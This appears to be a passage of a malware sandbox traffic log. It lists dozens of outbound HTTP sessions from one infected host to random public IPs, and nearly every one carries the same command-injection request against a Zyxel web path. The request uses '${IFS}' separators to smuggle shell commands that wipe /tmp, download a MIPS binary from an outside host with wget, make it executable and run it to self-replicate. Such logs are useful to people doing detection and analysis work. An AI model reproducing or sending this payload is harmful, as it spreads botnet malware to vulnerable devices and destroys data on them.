                                        Mar 31, 2024 09:22:29.704958916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8223192.168.2.2358270131.249.134.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705023050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8224192.168.2.2339280186.92.250.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705064058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8225192.168.2.2344960183.132.65.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705111980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8226192.168.2.2336908184.99.120.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705159903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8227192.168.2.233500658.55.140.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705197096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8228192.168.2.235345043.252.208.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705250025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8229192.168.2.235035042.22.89.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705284119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8230192.168.2.2353944167.234.137.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705337048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8231192.168.2.2342150156.37.81.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705387115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8232192.168.2.235836461.92.39.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705430031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8233192.168.2.2333498138.224.249.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705471039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8234192.168.2.2355836181.198.136.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705518007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8235192.168.2.2342636156.70.2.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705574036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8236192.168.2.2350200100.163.46.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705606937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8237192.168.2.2335440181.73.190.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705683947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8238192.168.2.2358192217.26.26.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705713987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8239192.168.2.234819264.228.161.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705750942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8240192.168.2.2337070155.96.253.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705801010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8241192.168.2.2341624119.225.100.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705854893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8242192.168.2.235464099.253.247.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705894947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8243192.168.2.2356486113.107.255.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705935955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8244192.168.2.2332830186.13.112.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.705985069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8245192.168.2.2339896223.18.180.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706022978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8246192.168.2.235125062.23.235.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706069946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8247192.168.2.2347654220.141.231.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706120014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8248192.168.2.2352110121.76.171.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706155062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8249192.168.2.233659825.139.53.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706211090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8250192.168.2.2357944133.82.2.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706239939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8251192.168.2.2357848204.52.75.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706283092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8252192.168.2.234801889.14.205.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706330061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8253192.168.2.234169085.51.255.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706382036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8254192.168.2.235530867.237.129.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706418991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8255192.168.2.2349038152.0.246.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706466913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8256192.168.2.2339332203.96.80.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706521988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8257192.168.2.2355688137.0.18.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706568956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8258192.168.2.2341074187.13.136.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706603050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8259192.168.2.2358900130.173.158.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706665993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8260192.168.2.235267670.82.199.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706711054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8261192.168.2.233886670.249.30.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706726074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8262192.168.2.236045473.11.119.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706768036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8263192.168.2.2345286112.135.9.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706813097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8264192.168.2.2350112135.48.80.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706865072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8265192.168.2.2348484102.247.62.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706899881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8266192.168.2.2346856164.231.189.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.706959963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8267192.168.2.2335782153.136.252.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707012892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8268192.168.2.2357354175.92.106.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707053900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8269192.168.2.235394497.51.228.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707107067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8270192.168.2.2360782168.59.243.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707163095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8271192.168.2.233764061.145.80.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707196951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8272192.168.2.2337652196.114.2.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707238913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8273192.168.2.23380928.21.244.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707297087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8274192.168.2.2350444121.254.252.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707345009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8275192.168.2.2348990211.76.164.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707381010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8276192.168.2.2336194121.28.1.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707432985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8277192.168.2.2346774123.155.250.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707487106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8278192.168.2.234419038.90.216.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707529068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8279192.168.2.235444035.228.251.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707556009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8280192.168.2.233788837.98.25.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707607031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8281192.168.2.2345372178.49.250.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707659960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8282192.168.2.2353444154.220.116.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707700014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8283192.168.2.2360942176.129.106.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707726955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8284192.168.2.2338522175.32.227.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707787037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8285192.168.2.2354734201.31.77.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707834959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8286192.168.2.2338282128.166.195.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707871914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8287192.168.2.2354534213.24.174.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707942009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8288192.168.2.236084086.46.245.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.707973003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8289192.168.2.236088227.43.192.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:29.708031893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8290192.168.2.2340896133.105.64.210443
                                        TimestampBytes transferredDirectionData
